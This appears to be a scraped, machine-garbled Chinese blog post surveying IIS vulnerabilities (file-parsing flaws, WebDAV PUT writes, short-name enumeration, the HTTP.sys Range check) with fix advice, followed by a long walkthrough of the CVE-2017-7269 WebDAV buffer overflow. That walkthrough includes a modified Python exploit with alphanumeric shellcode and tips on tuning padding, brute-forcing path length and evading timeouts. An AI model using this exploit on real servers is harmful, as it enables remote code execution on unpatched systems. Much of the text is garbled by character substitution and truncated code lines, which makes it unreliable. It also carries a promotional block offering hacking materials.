php526msi技巧_Web中心件常见马脚总结

IIS目前只适用于Windows系统，不适用于其他操作系统。

基于文件名该版本默认会将.asp;.jpg此种格式的文件名，当成Asp解析，事理是做事器默认不解析;号及其后面的内容，相称于截断。

基于文件夹名该版本 默认会将 .asp/目录下的所有文件当成Asp解析。

其余，IIS6.x除了会将扩展名为.asp的文件解析为asp之外，还默认会将扩展名为.asa，.cdx，.cer解析为asp，

从网站属性->主目录->配置 可以看出，他们都是调用了asp.dll进行的解析。

修复建议

由于微软并不认为这是一个漏洞，也没有推出IIS 6.0的补丁，因此漏洞须要自己修复。

【逐一帮助安全学习，所有资源关注我，私信回答“资料”获取~逐一】①网络安全学习路线②20份渗透测试电子书③安全攻防357页条记④50份安全攻防口试指南⑤安全红队渗透工具包⑥网络安全必备书本⑦100个漏洞实战案例⑧安全大厂内部教程

1.限定上传目录实行权限，不许可实行脚本。

2.不许可新建目录。

3.上传的文件需经由重命名(韶光戳+随机数+.jpg等)

安装IIS7.51.掌握面板 -> 程序 -> 打开或关闭windows功能。

1. 下载php-5.2.6-win32-installer.msi

5. 选择编辑ISAPI或者CGI限定

添加安装的php-cgi.exe路径，描述随意。

6.返回第五步的第一个图片位置，点击处理程序映射，添加如下。

7.phpinfo测试

IIS7.x版本 在Fast-CGI运行模式下,在任意文件，例：test.jpg后面加上/.php，会将test.jpg 解析为php文件。

修复建议配置cgi.fix_pathinfo(php.ini中)为0并重启php-cgi程序

结果如下：

PUT任意文件写入

IIS Server 在 Web 做事扩展中开启了 WebDAV之后，支持多种要求，合营写入权限，可造成任意文件写入。

关闭WebDAV 和 写权限

IIS短文件漏洞Windows 以 8.3 格式天生与 MS-DOS 兼容的（短）文件名，以许可基于 MS-DOS 或 16 位 Windows的程序访问这些文件。
在cmd下输入"dir /x"即可看到短文件名的效果。

IIS短文件名产生：

1. 当后缀小于4时，短文件名产生须要文件(夹)名前缀字符长度大于即是9位。
2. 当后缀大于即是4时，文件名前缀字符长度纵然为1，也会产生短文件名。

目前IIS支持短文件名预测的HTTP方法紧张包括：DEBUG、OPTIONS、GET、POST、HEAD、TRACE六种。

IIS 8.0之后的版本只能通过OPTIONS和TRACE方法被预测成功。
复现：

IIS8.0以下版本须要开启ASP.NET支持，IIS大于即是8.0版本,纵然没有安装ASP.NET，通过OPTIONS和TRACE方法也可以猜解成功。
以下通过开启IIS6.0 ASP.NET后进行复现。

当访问布局的某个存在的短文件名，会返回404；

当访问布局的某个不存在的短文件名，会返回400；

IIS短文件漏洞局限性

1)如果文件名本身太短也是无法猜解的；

2)此漏洞只能确定前6个字符，如果后面的字符太长、包含分外字符，很难猜解；3)如果文件名前6位带空格，8.3格式的短文件名会补进，和真实文件名不匹配；4)如果文件夹名前6位字符带点"."，扫描程序会认为是文件而不是文件夹，终极涌现误报；5)不支持中文文件名，包括中文文件和中文文件夹。
一个中文相称于两个英笔墨符，故超过4个中笔墨会产生短文件名，但是IIS不支持中文预测。

短文件利用工具下载

1）从CMD命令关闭NTFS 8.3文件格式的支持Windows Server 2003： (1代表关闭，0代表开启）

Windows Server 2008 R2：

查询是否开启短文件名功能：fsutil 8dot3name query

关闭该功能：fsutil 8dot3name set 1

不同系统关闭命令稍有差异，该功能默认是开启的. 2）或从修正注册表关闭NTFS 8.3文件格式的支持

快捷键Win+R打开命令窗口，输入regedit打开注册表窗口

找到路径：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem，将个中的 NtfsDisable8dot3NameCreation这一项的值设为 1，1代表不创建短文件名格式

以上两种办法修正完成后，均须要重启系统生效。

Note:此方法只能禁止NTFS8.3格式文件名创建,已经存在的文件的短文件名无法移除，须要重新复制才会消逝。
例:将web文件夹的内容拷贝到另一个位置，如c:\www到c:\ww,然后删除原文件夹，再重命名c:\ww到c:\www。

影响范围：Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2复现：

在Windows7上 安装IIS7.5。
1.访问。

编辑要求头，增加Range: bytes=0-18446744073709551615 字段，若返回码状态为416 Requested Range Not Satisfiable，则存在HTTP.SYS远程代码实行漏洞

漏洞有点鸡肋，合营其他漏洞利用还是可以用用的，详细利用可转至MSF中。

安装修复补丁（KB3042553）

Microsoft Windows Server 2003 R2中的Internet信息做事（IIS）6.0中的WebDAV做事中的ScStoragePathFromUrl函数中的缓冲区溢出许可远程攻击者通过以"If：<http：//"开头的长标头实行任意代码PROPFIND要求。
影响范围：在Windows 2003 R2（Microsoft® Windows® Server 2003, Enterprise Edition Service Pack 2）上利用IIS 6.0并开启WebDAV扩展。
复现：

CVE给出的exp 打算机弹弹弹！
！
！
用python2 运行，结果如下。

任务管理器开启了calc.exe进程，由于打算器是网络做事权限打开的，以是我们在桌面上看不见。
这个漏洞有几个须要把稳的地方，如下。

由于作者供应的Exp实行之后就卡在那里了，因此不适宜用弹打算机的shellcode进行测试，网上找了个dalao的回显shellcode来测试。
首先将上图中python2 IDE运行时产生的Raw类型的HTTP数据包copy保存至记事本中，然后在Burp Repeater模块 Paste from file。
将shellcode改换成如下：

VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDK

结果：

CVE作者给出的Exp是在默认端口，默认域名，默认路径的情形下适用。
第一个须要把稳的是端口和域名绑定问题：当端口改变时，If头信息中的两个url端口要与站点端口同等，如下。

当域名改变时，If头信息中的两个url域名要与站点域名同等，且HOST头也要与站点域名同等。
如下

不修正Host将返回502,如下

Note:测试的时候凡是须要修正IIS配置的操作，修正完毕后都须要重启IIS，或者在不超过禁用阈值的条件下结束w3wp进程。

第二个须要把稳的是物理路径问题：

CVE作者供应的Exp是在 默认路径长度即是19(包括结尾的反斜杠)的情形下适用，IIS默认路径一样平常为：c:\inetpub\wwwroot

办理方法：当路径长度小于19时须要对padding进行添加。
当路径长度大于19时须要对padding进行删除。

ROP和stackpivot前面的padding实际上为UTF8编码的字符，每三个字节解码后变为两个字节的UTF16字符，在担保Exp不出错的情形下，有0x58个字符是没用的。
以是可以将前0x108个字节删除，换成0x58个a或b。

原exp 修正后如下：

# coding:utf-8 import socketsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('192.168.124.129',8888))pay='PROPFIND / HTTP/1.1\r\nHost: www.lxhsec.com\r\nContent-Length: 0\r\n' pay+='If: <http://www.lxhsec.com:8888/aaaaaaa'pay+='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' pay+='\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\ pay+='>'pay+=' (Not <locktoken:write1>) <http://www.lxhsec.com:8888/bbbbbbb' pay+='bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb' pay+='\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\ shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30Apay+=shellcode pay+='>\r\n\r\n' print pay sock.send(pay)data = sock.recv(80960) print datasock.close

实行：

当路径长度小于19时，如下，须要增加12个a，b

而实际中路径常常大于19，须要对padding进行删除。

当路径为c:\www\ 的时候，a有107个，加起来有114个，撤除盘符有111个字符，以是可以把Exp的padding增加至111，并逐次进行减少。
当长度不匹配时返回500，成功时返回200，通过爆破办法得到物理路径长度。

成功:

失落败:

当然如果能得到物理路径，则用114减去物理路径长度（包括末端的反斜杠）便是所需的padding长度。
第三个须要把稳的是，超时问题。
当exp实行成功一段韶光之后（大概十分钟到二十分钟旁边，其间无论有无访问），再对这个站点实行exp永久不会成功，同时返回400。
办理方法：

1. 等待w3wp重启。

2. 测试旁站（由于每个池都是独立的w3wp进程，换一个可能在其他池的旁站进行考试测验） 第四个须要把稳的是，多次实行缺点shellcode

多次实行缺点的shellcode会覆盖很多不该覆盖的代码，从而导致精确的shellcode实行时也返回500， 提示信息为：参数禁绝确，也可能什么都不返回。

办理方法：1.等待w3wp重启。
2.测试旁站（由于每个池都是独立的w3wp进程，换一个可能在其他池的旁站进行考试测验）

关闭 WebDAV

Web中间件常见漏洞还远不止这些，等往后空闲再补录。